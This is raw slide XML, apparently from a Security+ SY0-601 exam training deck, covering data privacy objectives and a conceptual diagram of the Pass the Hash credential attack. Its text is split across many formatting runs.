              <a:rPr dirty="0" spc="-100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>SY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t>601  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>Exam</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>Training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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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993898" y="4258436"/>
            <a:ext cx="6209030" cy="835660"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2261870" marR="5080" indent="-2249805">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Domai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t>4:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="215"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="160"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>tion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Incident  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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97578" y="4301109"/>
            <a:ext cx="4950460" cy="8788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683260" marR="5080" indent="-670560">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="95"/>
              <a:t>Explaining</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80"/>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-830"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>Concepts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02278" y="784098"/>
            <a:ext cx="3538854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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives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9692" y="1187196"/>
            <a:ext cx="4820411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97763" y="2254757"/>
            <a:ext cx="6424930" cy="23685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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>By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en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thi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lesson,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you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w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ll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abl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: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2750">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Assess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privacy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sensitivit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concepts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050">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Analyze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privacy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pr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ec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ion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ntr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ls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3028188"/>
            <a:ext cx="457200" cy="4572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4146803"/>
            <a:ext cx="457200" cy="4572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411605" y="5506592"/>
            <a:ext cx="507365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Li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privacy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enhan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emen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ch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olo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-175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es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5388864"/>
            <a:ext cx="457200" cy="45720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411605" y="6698995"/>
            <a:ext cx="55118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Compare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database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identification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methods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6580631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7646" y="4258436"/>
            <a:ext cx="6680834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85"/>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>Sensitivity</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>Concepts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50940" y="306451"/>
            <a:ext cx="37560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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attack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03747" y="760476"/>
            <a:ext cx="511149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76652" y="1882292"/>
            <a:ext cx="12565380" cy="796925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Pass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Hash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(PtH)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process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exploiting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cached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credentials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3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perform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lateral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movement.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
            </a:pP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given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screenshot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depicts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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>PtH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process.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78507" y="2886455"/>
            <a:ext cx="12762230" cy="5430520"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12762230" h="5430520">
                <a:moveTo>
                  <a:pt x="12467336" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="294640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246826" y="3853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201476" y="15012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159196" y="32870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120591" y="56822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86264" y="86264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56822" y="120591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32870" y="159196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15012" y="201476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3853" y="246826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="294640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5135422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3853" y="5183207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15012" y="5228536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32870" y="5270804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56822" y="5309404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86264" y="5343729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120591" y="5373174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159196" y="5397130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201476" y="5414993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246826" y="5426156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294640" y="5430012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12467336" y="5430012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12515118" y="5426156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12560450" y="5414993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12602723" y="5397130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12641330" y="5373174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12675663" y="5343729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12705116" y="5309404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12729081" y="5270804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12746951" y="5228536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12758118" y="5183207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12761976" y="5135422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12761976" y="294640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12758118" y="246826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12746951" y="201476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12729081" y="159196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12705116" y="120591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12675663" y="86264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12641330" y="56822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12602723" y="32870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12560450" y="15012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12515118" y="3853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12467336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787890" y="3807079"/>
            <a:ext cx="150368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91440" marR="5080" indent="-79375">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>DC</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rifi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-12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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>user  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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6578" y="3807079"/>
            <a:ext cx="133731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>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Victi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on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764785" y="3334511"/>
            <a:ext cx="8166734" cy="853440"/>
            <a:chOff x="4764785" y="3334511"/>
            <a:chExt cx="8166734" cy="85344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45695" y="3334511"/>
              <a:ext cx="885444" cy="85343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764786" y="3690492"/>
              <a:ext cx="7017384" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7017384" h="142875">
                  <a:moveTo>
                    <a:pt x="2607310" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2578633" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578836" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2607310" y="71501"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="7017384" h="142875">
                  <a:moveTo>
                    <a:pt x="7017385" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6988708" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6874510" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6874510" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694176" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694176" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6874510" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6874510" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6988911" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7017385" y="71501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5104003" y="5004942"/>
            <a:ext cx="190309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>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Victi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>aga</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-15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054210" y="4818634"/>
            <a:ext cx="197993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03530" marR="5080" indent="-291465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-4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dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600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dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SAM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816602" y="4873116"/>
            <a:ext cx="2607310" cy="142875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2607309" h="142875">
                <a:moveTo>
                  <a:pt x="2464434" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2464434" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2578836" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478786" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478786" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2578633" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464434" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2607309" h="142875">
                <a:moveTo>
                  <a:pt x="2464434" y="57150"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464434" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464434" y="57150"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2607309" h="142875">
                <a:moveTo>
                  <a:pt x="2578633" y="57150"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2478786" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478786" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2578836" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2607309" y="71500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2578633" y="5715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9359265" y="7337552"/>
            <a:ext cx="225425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207010">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ha</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-4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dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
